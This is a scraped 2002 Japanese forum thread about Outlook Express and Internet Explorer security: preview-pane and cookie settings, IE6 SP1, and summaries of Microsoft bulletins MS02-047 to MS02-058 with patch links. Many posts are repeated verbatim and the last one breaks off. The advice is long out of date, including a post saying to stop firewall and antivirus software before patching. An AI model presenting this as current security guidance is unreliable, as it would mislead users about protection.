HTTP_USER_AGENT . Mozilla/4.0 (compatible; MSIE 5.5; Windows 98; T312461)
と出ます。これで問題ないんですよね?
122 :名無しさん@お腹いっぱい。:02/08/29 18:37
誰もUAに出るとは言ってないんだが。
123 :名無しさん@お腹いっぱい。:02/08/30 11:36
124 :名無しさん@お腹いっぱい。:02/09/08 01:51
ウィルス対策で「プレビューウィンドウの表示をOFFにしろ」というのさんざん言われて
いるが使いにくいので普段OFFにしていない人も多いだろう。
プレビューウィンドウの表示/非表示切り替えるのにいちいち「表示」-「レイアウト」
と選択していくのは面倒なのでワンクリックでプレビューウィンドウの表示/非表示を切
り替える方法はないのか(たぶんないんだろうなあ)と思ってこの前OEの設定をいじって
たらあるんだね。ツールバーにプレビューボタンを追加すればいいだけだよ。
今までこんなことも知らなかったとは・・・。
これでOEもかなり使いやすくなったよ。といいつつメーラーとしてはメインで使ってない
けど。
方法はツールバー上で右クリックして「カスタマイズ」→「ツールバーの変更」でプレビ
ューボタンを追加
いるが使いにくいので普段OFFにしていない人も多いだろう。
プレビューウィンドウの表示/非表示切り替えるのにいちいち「表示」-「レイアウト」
と選択していくのは面倒なのでワンクリックでプレビューウィンドウの表示/非表示を切
り替える方法はないのか(たぶんないんだろうなあ)と思ってこの前OEの設定をいじって
たらあるんだね。ツールバーにプレビューボタンを追加すればいいだけだよ。
今までこんなことも知らなかったとは・・・。
これでOEもかなり使いやすくなったよ。といいつつメーラーとしてはメインで使ってない
けど。
方法はツールバー上で右クリックして「カスタマイズ」→「ツールバーの変更」でプレビ
ューボタンを追加
あぼーん
テスト3
127 :二つ目のお気に入りとして:02/09/08 08:25
128 :名無しさん@お腹いっぱい。:02/09/09 08:59
>>123 「選択したサーバーのクッキーのみを受け入れる」で2chを選択したサーバーに加えても書き込めないことが多いようだ。<Opera
「自動的にすべてのクッキーを受け入れる」にすると書き込める。
そうすると他のサイトでクッキーを食らってしまうので「終了時に新たなクッキー
を破棄する」にチェックを入れる。
さらにFW製品(NISなど)で他のサイトのクッキーを制限するといい。
「自動的にすべてのクッキーを受け入れる」にすると書き込める。
そうすると他のサイトでクッキーを食らってしまうので「終了時に新たなクッキー
を破棄する」にチェックを入れる。
さらにFW製品(NISなど)で他のサイトのクッキーを制限するといい。
129 :名無しさん@お腹いっぱい。:02/09/09 18:15
MicrosoftがIE 6 Service Pack 1を準備中
Microsoftが,Internet Explorer(IE) 6 Service Pack 1(SP1)を準備して
いることが 明らかになった。
http://itpro.nikkeibp.co.jp/free/NT/NEWS/20020909/1/
http://pc.2ch.net/test/read.cgi/sec/1005605775/795とマルチスマソ
Microsoftが,Internet Explorer(IE) 6 Service Pack 1(SP1)を準備して
いることが 明らかになった。
http://itpro.nikkeibp.co.jp/free/NT/NEWS/20020909/1/
http://pc.2ch.net/test/read.cgi/sec/1005605775/795とマルチスマソ
130 :深刻度「高」:02/09/10 21:07
IEスレにも貼ったけど、OEも関係してるようなので一応
IE に新たな脆弱性、イスラエル企業が警告
http://japan.internet.com/webtech/20020910/10.html
IE に新たな脆弱性、イスラエル企業が警告
http://japan.internet.com/webtech/20020910/10.html
131 :名無しさん@お腹いっぱい。:02/09/10 22:17
>>130 Thanks!とりあえず Active Scripting無効にするよ。
132 :名無しさん@お腹いっぱい。:02/09/12 17:53
sp1でプレーンテキストでの表示が可能になったとか
133 :名無しさん@お腹いっぱい。:02/09/12 18:20
>132 ソースキボンヌ
134 :名無しさん@お腹いっぱい。:02/09/12 18:33
135 :名無しさん@お腹いっぱい。:02/09/12 19:44
SP1英語版入れたよ。
確かにoption>read>reading messagesのところの上から四番目の項目に、
Read all messages in plain textってのが出来てるね。
まあOEは使ってないからね。
BECKYにも当然のことなが同じようなconvert to plain textっていう項目があるよ。
確かにoption>read>reading messagesのところの上から四番目の項目に、
Read all messages in plain textってのが出来てるね。
まあOEは使ってないからね。
BECKYにも当然のことなが同じようなconvert to plain textっていう項目があるよ。
136 :名無しさん@お腹いっぱい。:02/09/12 21:26
漏れも英語版入れた
したらVMLだかのインストール失敗しますとさ
鬱だ
したらVMLだかのインストール失敗しますとさ
鬱だ
137 :名無しさん@お腹いっぱい。:02/09/12 22:38
どうせなら江戸マックスみたいにツールバーから変えられればええのに
138 :名無しさん@お腹いっぱい。:02/09/13 00:40
プレーンテキストで読めるって事はプレビューでの危険性が
減るって事?
減るって事?
139 :名無しさん@お腹いっぱい。:02/09/13 08:05
>>138 そだね。M$のやることだから油断は禁物だが。
140 :名無しさん@お腹いっぱい。:02/09/14 13:42
IE6SP1、まだ英語版、ドイツ語版、フランス語版しかリリースされてないね。
141 :名無しさん@お腹いっぱい。:02/09/15 08:23
MSの鯖の中にコソーリ入ってた。
http://download.microsoft.com/download/ie6sp1/finrel/6_sp1/W98NT42KMeXP/JA/ie6setup.exe
http://download.microsoft.com/download/ie6sp1/finrel/6_sp1/W98NT42KMeXP/JA/ie6setup.exe
142 :名無しさん@お腹いっぱい。:02/09/15 08:50
↑コンポーネント入ってなかった。
143 :名無しさん@お腹いっぱい。:02/09/19 07:27
IE6SP1出たよ。
HTMLメールをテキスト形式で表示できるようになった。
Japaneseを選択してね。
ttp://www.microsoft.com/windows/ie/downloads/critical/ie6sp1/default.asp
HTMLメールをテキスト形式で表示できるようになった。
Japaneseを選択してね。
ttp://www.microsoft.com/windows/ie/downloads/critical/ie6sp1/default.asp
144 :名無しさん@お腹いっぱい。:02/09/19 07:47
日本語のDLページもできたみたいだ。
ttp://www.microsoft.com/windows/ie_intl/ja/
ttp://www.microsoft.com/windows/ie_intl/ja/
145 :名無しさん@お腹いっぱい。:02/09/19 09:11
146 :名無しさん@お腹いっぱい。:02/09/19 12:30
OEのセキュリティが向上したよ。
これまでできなかったHTMLメールのテキスト表示が可能になった。
IEではファイルのダウンロード時のダイアログに安全性に関する
警告文が出るようになった。
それからMicrosoft の説明によると。
「Internet Explorer 6 での懸案事項を解決したアップデート ファイルの集積です」
だそうですよ。
これまでできなかったHTMLメールのテキスト表示が可能になった。
IEではファイルのダウンロード時のダイアログに安全性に関する
警告文が出るようになった。
それからMicrosoft の説明によると。
「Internet Explorer 6 での懸案事項を解決したアップデート ファイルの集積です」
だそうですよ。
147 :名無しさん@お腹いっぱい。:02/09/19 12:38
OEって一つのメールを開いた状態でそのメールを削除すると自動的に
次のメールが開くんだよな。そのメールを削除したいだけで次のメールを
開くかどうかについては何も指示してないのに勝手に開く。次のメールがウィルスメールだったりしたら危険だと思う。アンチウィルス入れてれば
いいんだけど、やはり嫌だ。
次のメールが開くんだよな。そのメールを削除したいだけで次のメールを
開くかどうかについては何も指示してないのに勝手に開く。次のメールがウィルスメールだったりしたら危険だと思う。アンチウィルス入れてれば
いいんだけど、やはり嫌だ。
148 :名無しさん@お腹いっぱい。:02/09/19 12:43
削除する時だけツールバーのボタンでプレビュー表示にしなければいいじゃない。
149 :名無しさん@お腹いっぱい。:02/09/19 13:04
>>148 プレビュー切ってても、メールを開いたままで削除ボタンを押すと
次のメールに切る変わるんだよ。
次のメールに切る変わるんだよ。
150 :名無しさん@お腹いっぱい。:02/09/19 14:01
7634KBから落ちないぞおおおおお
151 :名無しさん@お腹いっぱい。:02/09/19 14:09
「MS02-052: Microsoft VM JDBC クラスの問題により、コードが実行される (Q329077)」
http://www.microsoft.com/japan/technet/treeview/default.asp?url=/japan/technet/security/bulletin/ms02-052ov.asp
http://www.microsoft.com/japan/technet/treeview/default.asp?url=/japan/technet/security/bulletin/ms02-052ov.asp
152 :名無しさん@お腹いっぱい。:02/09/19 14:39
153 :名無しさん@お腹いっぱい。:02/09/19 15:09
>>147-152
古いIEを使ってて、来たメールを読んで開いたまま削除すると次のメールが
MS01-020のセキュリティホール突くものだった場合にヤバイね。
その場合でもアンチウィルスソフトが常駐してれば大丈夫だけど。
古いIEを使ってて、来たメールを読んで開いたまま削除すると次のメールが
MS01-020のセキュリティホール突くものだった場合にヤバイね。
その場合でもアンチウィルスソフトが常駐してれば大丈夫だけど。
154 :名無しさん@お腹いっぱい。:02/09/19 15:18
155 :名無しさん@お腹いっぱい。:02/09/19 15:30
>>151 Windwos Updateで可能。ただし前提条件があるので>151のサイトで
バージョン等確かめてからパッチ当てること。
バージョン等確かめてからパッチ当てること。
156 :名無しさん@お腹いっぱい。:02/09/19 16:06
>>151 関連記事
Microsoft VMに深刻なセキュリティ・ホール,すべてのWindowsユーザーが対策を
マシンを乗っ取られる恐れあり,Windows Updateでパッチを適用する
http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20020919/2/
マイクロソフト,Windows XP SP1とIE 6 SP1の各日本語版を提供開始
http://itpro.nikkeibp.co.jp/free/NT/NEWS/20020919/1/
Microsoft VMに深刻なセキュリティ・ホール,すべてのWindowsユーザーが対策を
マシンを乗っ取られる恐れあり,Windows Updateでパッチを適用する
http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20020919/2/
マイクロソフト,Windows XP SP1とIE 6 SP1の各日本語版を提供開始
http://itpro.nikkeibp.co.jp/free/NT/NEWS/20020919/1/
157 :名無しさん@お腹いっぱい。:02/09/20 01:57
SP1入れたけど
これどこまでのパッチあたってるの?
これどこまでのパッチあたってるの?
158 :名無しさん@お腹いっぱい。:02/09/20 04:11
>>146
SP1入れてみたが
OEのテキスト→HTMLの切り替えはオプション画面でやるみたいやね。
ベッキや江戸みたいにメイン画面からワンクリックで切り替わる機能が無いぶん
初心者には安全性は高いが、
雛型メールとか乱発送信してる連中には、いろいろトラブルもありそうだ(W
SP1入れてみたが
OEのテキスト→HTMLの切り替えはオプション画面でやるみたいやね。
ベッキや江戸みたいにメイン画面からワンクリックで切り替わる機能が無いぶん
初心者には安全性は高いが、
雛型メールとか乱発送信してる連中には、いろいろトラブルもありそうだ(W
補足。
いったんテキスト表示に設定したあと、
テキスト→HTML表示の切り替えって意味ね(^^;
いったんテキスト表示に設定したあと、
テキスト→HTML表示の切り替えって意味ね(^^;
160 :名無しさん@お腹いっぱい。:02/09/20 10:30
>>157 Internet Explorer 用の累積的な修正プログラム (Q323759) (MS02-047)
まで含んでいるようだ。
http://www.microsoft.com/japan/technet/treeview/default.asp?url=/japan/technet/security/bulletin/ms02-047.asp
まで含んでいるようだ。
http://www.microsoft.com/japan/technet/treeview/default.asp?url=/japan/technet/security/bulletin/ms02-047.asp
161 :名無しさん@お腹いっぱい。:02/09/20 13:56
SP1を入れないと、どうなるんですか?
昨日入れたんだけど、IEに繋がらなくなって削除したんだけど
やっぱ入れたほうがいいんですか?
昨日入れたんだけど、IEに繋がらなくなって削除したんだけど
やっぱ入れたほうがいいんですか?
162 :名無しさん@お腹いっぱい。:02/09/20 15:30
>IEに繋がらなくなって
?
IE6に>>118の状態であればとりあえずはOKだけど(Gopher問題が残るが)。
そうでないとレアケースだがマシンが乗っ取られたりセキュリティ上の問題がある。
パッチ当てたりするときはFWやアンチウィルスなど常駐アプリを停止した上で
当てないと不具合でることあり。
?
IE6に>>118の状態であればとりあえずはOKだけど(Gopher問題が残るが)。
そうでないとレアケースだがマシンが乗っ取られたりセキュリティ上の問題がある。
パッチ当てたりするときはFWやアンチウィルスなど常駐アプリを停止した上で
当てないと不具合でることあり。
163 :名無しさん@お腹いっぱい。:02/09/21 12:58
本日HDが壊れて再インストール中。
本ちゃん入れてSP1を入れてから、Updateかけるも該当なし。
>>157 Internet Explorer 用の累積的な修正プログラム (Q323759) (MS02-047)
まで含んでいるようだ。
ありがとさん。
それは、
「この問題に対する修正は Windows XP Service Pack 1 以降に含まれています。」
という記述がネタ元?
ということは、MS02-050、51はあてなあかんねんな。
MSは一覧表位作れっちゅうんねん。
本ちゃん入れてSP1を入れてから、Updateかけるも該当なし。
>>157 Internet Explorer 用の累積的な修正プログラム (Q323759) (MS02-047)
まで含んでいるようだ。
ありがとさん。
それは、
「この問題に対する修正は Windows XP Service Pack 1 以降に含まれています。」
という記述がネタ元?
ということは、MS02-050、51はあてなあかんねんな。
MSは一覧表位作れっちゅうんねん。
164 :名無しさん@お腹いっぱい。:02/09/26 00:47
ア、アー・・・アレクサ!!
165 :名無しさん@お腹いっぱい。:02/10/03 08:29
証明書確認の問題により、ID が偽装される (Q328145) (MS02-050)
今回の更新内容
Outlook Express for Mac の問題を修正するプログラムを公開しました。
http://www.microsoft.com/japan/technet/security/bulletin/ms02-050.asp
今回の更新内容
Outlook Express for Mac の問題を修正するプログラムを公開しました。
http://www.microsoft.com/japan/technet/security/bulletin/ms02-050.asp
166 :セキュリティ情報:02/10/03 14:23
OEではなくWindows絡みだが、
「MS02-054: ファイル展開機能に含まれる未チェックのバッファにより、コードが実行される (Q323284)」
http://www.microsoft.com/japan/technet/security/bulletin/ms02-054ov.asp
対象となる製品(以下同じ)
・ Microsoft Windows 98
(Microsoft Plus! 98 をインストールしている環境)
・ Microsoft Windows 98 Second Edition
(Microsoft Plus! 98 をインストールしている環境)
・ Microsoft Windows Millennium Edition
・ Microsoft Windows XP
「MS02-055: Windows ヘルプ機能の未チェックのバッファにより、コードが実行される (Q323255)」
http://www.microsoft.com/japan/technet/security/bulletin/ms02-055ov.asp
・ Microsoft Windows 98
・ Microsoft Windows 98 Second Edition
・ Microsoft Windows Millennium Edition
・ Microsoft Windows NT 4.0
・ Microsoft Windows NT 4.0 Terminal Server Edition
・ Microsoft Windows 2000
・ Microsoft Windows XP
「MS02-056: SQL Server 用の累積的な修正プログラム (Q316333)」
http://www.microsoft.com/japan/technet/security/bulletin/ms02-056ov.asp
・ Microsoft SQL Server 7.0
・ Microsoft Desktop Engine (MSDE) 1.0
・ Microsoft SQL Server 2000
・ Microsoft Desktop Engine (MSDE) 2000
「MS02-057: Services for Unix 3.0 に含まれる Interix SDKでサービス拒否が起こる (Q329209)」
http://www.microsoft.com/japan/technet/security/bulletin/ms02-057ov.asp
・ Microsoft Windows NT 4.0
・ Microsoft Windows 2000
・ Microsoft Windows XP
「MS02-054: ファイル展開機能に含まれる未チェックのバッファにより、コードが実行される (Q323284)」
http://www.microsoft.com/japan/technet/security/bulletin/ms02-054ov.asp
対象となる製品(以下同じ)
・ Microsoft Windows 98
(Microsoft Plus! 98 をインストールしている環境)
・ Microsoft Windows 98 Second Edition
(Microsoft Plus! 98 をインストールしている環境)
・ Microsoft Windows Millennium Edition
・ Microsoft Windows XP
「MS02-055: Windows ヘルプ機能の未チェックのバッファにより、コードが実行される (Q323255)」
http://www.microsoft.com/japan/technet/security/bulletin/ms02-055ov.asp
・ Microsoft Windows 98
・ Microsoft Windows 98 Second Edition
・ Microsoft Windows Millennium Edition
・ Microsoft Windows NT 4.0
・ Microsoft Windows NT 4.0 Terminal Server Edition
・ Microsoft Windows 2000
・ Microsoft Windows XP
「MS02-056: SQL Server 用の累積的な修正プログラム (Q316333)」
http://www.microsoft.com/japan/technet/security/bulletin/ms02-056ov.asp
・ Microsoft SQL Server 7.0
・ Microsoft Desktop Engine (MSDE) 1.0
・ Microsoft SQL Server 2000
・ Microsoft Desktop Engine (MSDE) 2000
「MS02-057: Services for Unix 3.0 に含まれる Interix SDKでサービス拒否が起こる (Q329209)」
http://www.microsoft.com/japan/technet/security/bulletin/ms02-057ov.asp
・ Microsoft Windows NT 4.0
・ Microsoft Windows 2000
・ Microsoft Windows XP
167 :名無しさん@お腹いっぱい。:02/10/05 00:11
age
168 :IE最新バージョンまとめ:02/10/07 12:00
・Windows95
5.50.4807.2300 Internet Explorer 5.5 Service Pack 2でQ323759がついていること
・Windows98/ME
6.00.2800.1106 Internet Explorer 6 Service Pack 1
6.00.2600.0000 Internet Explorer 6(フルまたは標準インストールのこと)でQ323759がついていること
5.50.4807.2300 Internet Explorer 5.5 Service Pack 2 でQ323759がついていること
・WindowsNT4.0SP6a
6.00.2800.1106 Internet Explorer 6 Service Pack 1
・Windows2000
6.00.2800.1106 Internet Explorer 6 Service Pack 1
6.00.2600.0000 Internet Explorer 6 でQ323759がついていること(Windows 2000SP2またはSP3のみ)
5.50.4807.2300 Internet Explorer 5.5 Service Pack 2 でQ323759がついていること(Windows 2000SP2またはSP3のみ)
5.00.3315.1000 Internet Explorer 5.01 SP2 でQ323759がついていること(Windows 2000SP2またはSP3のみ)
・WindowsXP
6.00.2800.1106 Internet Explorer 6 Service Pack 1
6.00.2600.0000 Internet Explorer 6 でQ323759がついていること
※インターネットエクスプローラのバージョン確認は、バージョン確認の「バージョン」で確認。
※Q323759は
http://www.microsoft.com/japan/technet/treeview/default.asp?url=/japan/technet/security/bulletin/ms02-047ov.asp
の修正パッチを当てる。
※MS02-009,MS02-050については以下のページで確認の上該当パッチを当てる。
http://www.microsoft.com/japan/technet/treeview/default.asp?url=/japan/technet/security/bulletin/ms02-009.asp
http://www.microsoft.com/japan/technet/treeview/default.asp?url=/japan/technet/security/bulletin/ms02-050.asp
バージョンに表示されません。
なお、Q323759の対象からNT4.0SP6aがはずされたのでIE5.01SP2はWindows2000でのみ最新状態となっ た。
Q323759は以前に公開された MS02-023 : 2002 年 5 月 15 日 Internet Explorer 用の累積的な修正プログ ラム (Q321232)
の修正を含む。
IE6SP1は MS02-047:累積的な修正プログラム (Q323759) の修正まで含む
5.50.4807.2300 Internet Explorer 5.5 Service Pack 2でQ323759がついていること
・Windows98/ME
6.00.2800.1106 Internet Explorer 6 Service Pack 1
6.00.2600.0000 Internet Explorer 6(フルまたは標準インストールのこと)でQ323759がついていること
5.50.4807.2300 Internet Explorer 5.5 Service Pack 2 でQ323759がついていること
・WindowsNT4.0SP6a
6.00.2800.1106 Internet Explorer 6 Service Pack 1
・Windows2000
6.00.2800.1106 Internet Explorer 6 Service Pack 1
6.00.2600.0000 Internet Explorer 6 でQ323759がついていること(Windows 2000SP2またはSP3のみ)
5.50.4807.2300 Internet Explorer 5.5 Service Pack 2 でQ323759がついていること(Windows 2000SP2またはSP3のみ)
5.00.3315.1000 Internet Explorer 5.01 SP2 でQ323759がついていること(Windows 2000SP2またはSP3のみ)
・WindowsXP
6.00.2800.1106 Internet Explorer 6 Service Pack 1
6.00.2600.0000 Internet Explorer 6 でQ323759がついていること
※インターネットエクスプローラのバージョン確認は、バージョン確認の「バージョン」で確認。
※Q323759は
http://www.microsoft.com/japan/technet/treeview/default.asp?url=/japan/technet/security/bulletin/ms02-047ov.asp
の修正パッチを当てる。
※MS02-009,MS02-050については以下のページで確認の上該当パッチを当てる。
http://www.microsoft.com/japan/technet/treeview/default.asp?url=/japan/technet/security/bulletin/ms02-009.asp
http://www.microsoft.com/japan/technet/treeview/default.asp?url=/japan/technet/security/bulletin/ms02-050.asp
バージョンに表示されません。
なお、Q323759の対象からNT4.0SP6aがはずされたのでIE5.01SP2はWindows2000でのみ最新状態となっ た。
Q323759は以前に公開された MS02-023 : 2002 年 5 月 15 日 Internet Explorer 用の累積的な修正プログ ラム (Q321232)
の修正を含む。
IE6SP1は MS02-047:累積的な修正プログラム (Q323759) の修正まで含む
WindowsNT4.0SP6aに漏れがありました。またQ323759がIE5.5SP1にも用意されたのでIE5.5SP1にQ323759でもOK。
・Windows95
5.50.4807.2300 Internet Explorer 5.5 Service Pack 2 でQ323759がついていること
5.50.4522.1800 Internet Explorer 5.5 Service Pack 1 でQ323759がついていること
・Windows98/ME
6.00.2800.1106 Internet Explorer 6 Service Pack 1
6.00.2600.0000 Internet Explorer 6(フルまたは標準インストールのこと)でQ323759がついていること
5.50.4807.2300 Internet Explorer 5.5 Service Pack 2 でQ323759がついていること
5.50.4522.1800 Internet Explorer 5.5 Service Pack 1 でQ323759がついていること
・WindowsNT4.0SP6a
6.00.2800.1106 Internet Explorer 6 Service Pack 1
6.00.2600.0000 Internet Explorer 6 でQ323759がついていること
5.50.4807.2300 Internet Explorer 5.5 Service Pack 2 でQ323759がついていること
5.50.4522.1800 Internet Explorer 5.5 Service Pack 1 でQ323759がついていること
・Windows95
5.50.4807.2300 Internet Explorer 5.5 Service Pack 2 でQ323759がついていること
5.50.4522.1800 Internet Explorer 5.5 Service Pack 1 でQ323759がついていること
・Windows98/ME
6.00.2800.1106 Internet Explorer 6 Service Pack 1
6.00.2600.0000 Internet Explorer 6(フルまたは標準インストールのこと)でQ323759がついていること
5.50.4807.2300 Internet Explorer 5.5 Service Pack 2 でQ323759がついていること
5.50.4522.1800 Internet Explorer 5.5 Service Pack 1 でQ323759がついていること
・WindowsNT4.0SP6a
6.00.2800.1106 Internet Explorer 6 Service Pack 1
6.00.2600.0000 Internet Explorer 6 でQ323759がついていること
5.50.4807.2300 Internet Explorer 5.5 Service Pack 2 でQ323759がついていること
5.50.4522.1800 Internet Explorer 5.5 Service Pack 1 でQ323759がついていること
・Windows2000
6.00.2800.1106 Internet Explorer 6 Service Pack 1
6.00.2600.0000 Internet Explorer 6 でQ323759がついていること(Windows 2000SP2またはSP3のみ)
5.50.4807.2300 Internet Explorer 5.5 Service Pack 2 でQ323759がついていること(Windows 2000SP2またはSP3のみ)
5.50.4522.1800 Internet Explorer 5.5 Service Pack 1 でQ323759がついていること(Windows 2000SP2またはSP3のみ)
5.00.3315.1000 Internet Explorer 5.01 SP2 でQ323759がついていること(Windows 2000SP2またはSP3のみ)
・WindowsXP
6.00.2800.1106 Internet Explorer 6 Service Pack 1
6.00.2600.0000 Internet Explorer 6 でQ323759がついていること
※インターネットエクスプローラのバージョン確認は、バージョン確認の「バージョン」で確認。
※Q323759は
http://www.microsoft.com/japan/technet/treeview/default.asp?url=/japan/technet/security/bulletin/ms02-047ov.asp
の修正パッチを当てる。
※MS02-009,MS02-050については以下のページで確認の上該当パッチを当てる。
http://www.microsoft.com/japan/technet/treeview/default.asp?url=/japan/technet/security/bulletin/ms02-009.asp
http://www.microsoft.com/japan/technet/treeview/default.asp?url=/japan/technet/security/bulletin/ms02-050.asp
バージョンに表示されません。
なお、Q323759は以前に公開された MS02-023 : 2002 年 5 月 15 日 Internet Explorer 用の累積的な修正プログ ラム (Q321232)の修正を含む。
IE6SP1は MS02-047:累積的な修正プログラム (Q323759) の修正まで含む
6.00.2800.1106 Internet Explorer 6 Service Pack 1
6.00.2600.0000 Internet Explorer 6 でQ323759がついていること(Windows 2000SP2またはSP3のみ)
5.50.4807.2300 Internet Explorer 5.5 Service Pack 2 でQ323759がついていること(Windows 2000SP2またはSP3のみ)
5.50.4522.1800 Internet Explorer 5.5 Service Pack 1 でQ323759がついていること(Windows 2000SP2またはSP3のみ)
5.00.3315.1000 Internet Explorer 5.01 SP2 でQ323759がついていること(Windows 2000SP2またはSP3のみ)
・WindowsXP
6.00.2800.1106 Internet Explorer 6 Service Pack 1
6.00.2600.0000 Internet Explorer 6 でQ323759がついていること
※インターネットエクスプローラのバージョン確認は、バージョン確認の「バージョン」で確認。
※Q323759は
http://www.microsoft.com/japan/technet/treeview/default.asp?url=/japan/technet/security/bulletin/ms02-047ov.asp
の修正パッチを当てる。
※MS02-009,MS02-050については以下のページで確認の上該当パッチを当てる。
http://www.microsoft.com/japan/technet/treeview/default.asp?url=/japan/technet/security/bulletin/ms02-009.asp
http://www.microsoft.com/japan/technet/treeview/default.asp?url=/japan/technet/security/bulletin/ms02-050.asp
バージョンに表示されません。
なお、Q323759は以前に公開された MS02-023 : 2002 年 5 月 15 日 Internet Explorer 用の累積的な修正プログ ラム (Q321232)の修正を含む。
IE6SP1は MS02-047:累積的な修正プログラム (Q323759) の修正まで含む
171 :名無しさん@お腹いっぱい。:02/10/07 20:13
「IE6 SP1を適用して,Outlook Expressで HTMLを表示しない設定に」
――IPAが呼びかけ
http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20021007/1/
コンピュータウイルスの届出状況について[要旨]
http://www.ipa.go.jp/security/txt/2002_10outline.html
――IPAが呼びかけ
http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20021007/1/
コンピュータウイルスの届出状況について[要旨]
http://www.ipa.go.jp/security/txt/2002_10outline.html
172 :名無しさん@お腹いっぱい。:02/10/07 21:54
なんでいまだにIEやOE使ってるの?
パッチ貼るのが趣味ですか?
会社用でやむを得ずが大半だとは思うが・・それにしても・・
パッチ貼るのが趣味ですか?
会社用でやむを得ずが大半だとは思うが・・それにしても・・
173 :名無しさん@お腹いっぱい。:02/10/07 22:21
174 :名無しさん@お腹いっぱい。:02/10/07 22:30
>>172
パッチはるのが唯一の楽しみでございます
パッチはるのが唯一の楽しみでございます
175 :名無しさん@お腹いっぱい。:02/10/07 22:35
むしろ会社でこそIE・OEは使わん。万が一があった場合に取引先に対する
信用問題になっちまう。
信用問題になっちまう。
176 :名無しさん@お腹いっぱい。:02/10/07 22:45
会社では、オークションとかロトとかやってるヤツは、
警告アナウンス無視で OE やってます。
この前 IE6SP1 アナウンスしてやったら、エラーになったと
文句メールがきたさぁ。。。
警告アナウンス無視で OE やってます。
この前 IE6SP1 アナウンスしてやったら、エラーになったと
文句メールがきたさぁ。。。
177 :名無しさん@お腹いっぱい。:02/10/07 23:40
俺のブラウザツギハギだらけ
178 :名無しさん@お腹いっぱい。:02/10/08 00:25
>WindowsOS使っててIE使わないで済む人はまずいない。
組み込みコンポーネントなんだから。
そりゃ大変だねぇ(w
組み込みコンポーネントなんだから。
そりゃ大変だねぇ(w
179 :名無しさん@お腹いっぱい。:02/10/08 19:15
ネットに関して危機感が持てる。
180 :名無しさん@お腹いっぱい。:02/10/11 09:24
「MS02-058: Outlook Express の S/MIME 解析の未チェックのバッファによりシステムが侵害される(Q328676)」
この問題は、下記製品の S/MIME コントロールに含まれる未チェックの
バッファにより、不正なプログラムが実行される可能性がある問題です。
最悪の場合、悪意のあるユーザーにお客様のコンピューター上で任意の
プログラムが実行される可能性があります。
対象となる製品
・ Microsoft Outlook Express 6
・ Microsoft Outlook Express 5.5
修正プログラム
・ Microsoft Outlook Express 6
http://download.microsoft.com/download/IE60/oepac_29/6/W98NT42KMeXP/JA/q328676.exe
・ Microsoft Outlook Express 5.5
http://download.microsoft.com/download/ie55sp2/oepac_29/5.5_sp2/W98NT42KMe/JA/q328389.exe
備考: Outlook Express 5.5 用の修正プログラムのファイル名は、
本セキュリティ情報の文書番号 (Q328676) とは異なっています。
MS02-058: Unchecked Buffer in Outlook Express S/MIME Parsing Could
Enable System Compromise (Q328676)
http://www.microsoft.com/technet/security/bulletin/MS02-058.asp
この問題は、下記製品の S/MIME コントロールに含まれる未チェックの
バッファにより、不正なプログラムが実行される可能性がある問題です。
最悪の場合、悪意のあるユーザーにお客様のコンピューター上で任意の
プログラムが実行される可能性があります。
対象となる製品
・ Microsoft Outlook Express 6
・ Microsoft Outlook Express 5.5
修正プログラム
・ Microsoft Outlook Express 6
http://download.microsoft.com/download/IE60/oepac_29/6/W98NT42KMeXP/JA/q328676.exe
・ Microsoft Outlook Express 5.5
http://download.microsoft.com/download/ie55sp2/oepac_29/5.5_sp2/W98NT42KMe/JA/q328389.exe
備考: Outlook Express 5.5 用の修正プログラムのファイル名は、
本セキュリティ情報の文書番号 (Q328676) とは異なっています。
MS02-058: Unchecked Buffer in Outlook Express S/MIME Parsing Could
Enable System Compromise (Q328676)
http://www.microsoft.com/technet/security/bulletin/MS02-058.asp
181 :名無しさん@お腹いっぱい。:02/10/11 09:25
「MS02-058: Outlook Express の S/MIME 解析の未チェックのバッファによりシステムが侵害される(Q328676)」
詳細
この修正プログラムをインストールすることにより、
悪意のあるユーザーによる以下の攻撃を防ぐことができます。
(高) S/MIME コントロールの脆弱性を悪用し、
バッファのオーバーラン攻撃が行われる問題です。
対策が行われていないシステムがインターネットなどのネットワークを通じて
他のコンピュータと接続している場合、この問題を悪用した攻撃を
受けることがあります。この攻撃は、受動的攻撃という悪意のある
ユーザーから送られた HTML 形式の電子メールからも攻撃を受ける
可能性があります。この攻撃は、ハッカーまたはクラッカーと呼ばれる
悪意のあるユーザーや、ワームといった自動的な攻撃を目的とした悪意のある
プログラムから行われることがあります。
この脆弱性を悪用されることにより、
以下のような実害を受ける事が考えられます。
・ 実行する意図の無いアプリケーションが動作させられる可能性があります
(ハードディスクのフォーマットやワームなど)
・ Outlook Express が異常停止する可能性があります
詳細
この修正プログラムをインストールすることにより、
悪意のあるユーザーによる以下の攻撃を防ぐことができます。
(高) S/MIME コントロールの脆弱性を悪用し、
バッファのオーバーラン攻撃が行われる問題です。
対策が行われていないシステムがインターネットなどのネットワークを通じて
他のコンピュータと接続している場合、この問題を悪用した攻撃を
受けることがあります。この攻撃は、受動的攻撃という悪意のある
ユーザーから送られた HTML 形式の電子メールからも攻撃を受ける
可能性があります。この攻撃は、ハッカーまたはクラッカーと呼ばれる
悪意のあるユーザーや、ワームといった自動的な攻撃を目的とした悪意のある
プログラムから行われることがあります。
この脆弱性を悪用されることにより、
以下のような実害を受ける事が考えられます。
・ 実行する意図の無いアプリケーションが動作させられる可能性があります
(ハードディスクのフォーマットやワームなど)
・ Outlook Express が異常停止する可能性があります
182 :名無しさん@お腹いっぱい。:02/10/11 09:36
Q328676をインストールしようとすると
"この修正プログラムをインストールするにはInternetExplorer6.0が必要です。"
って出てエラーになってしまいます。
使ってるのがIE6SP1だからでしょうか?
"この修正プログラムをインストールするにはInternetExplorer6.0が必要です。"
って出てエラーになってしまいます。
使ってるのがIE6SP1だからでしょうか?
183 :名無しさん@お腹いっぱい。:02/10/11 09:46
>>182
WindowsXPSP1とInternet Explorer6SP1にはこの修正はすでに含まれてるので
パッチ不要。
I’m up to date on all service packs for my system. Do I need the patch?
The fix for this issue was included in Windows XP Service Pack 1, and in Internet Explorer 6.0 Service Pack 1. If you’ve installed either of these two service packs, you’re already protected against the vulnerability and don’t need the patch.
http://www.microsoft.com/technet/security/bulletin/MS02-058.asp
WindowsXPSP1とInternet Explorer6SP1にはこの修正はすでに含まれてるので
パッチ不要。
I’m up to date on all service packs for my system. Do I need the patch?
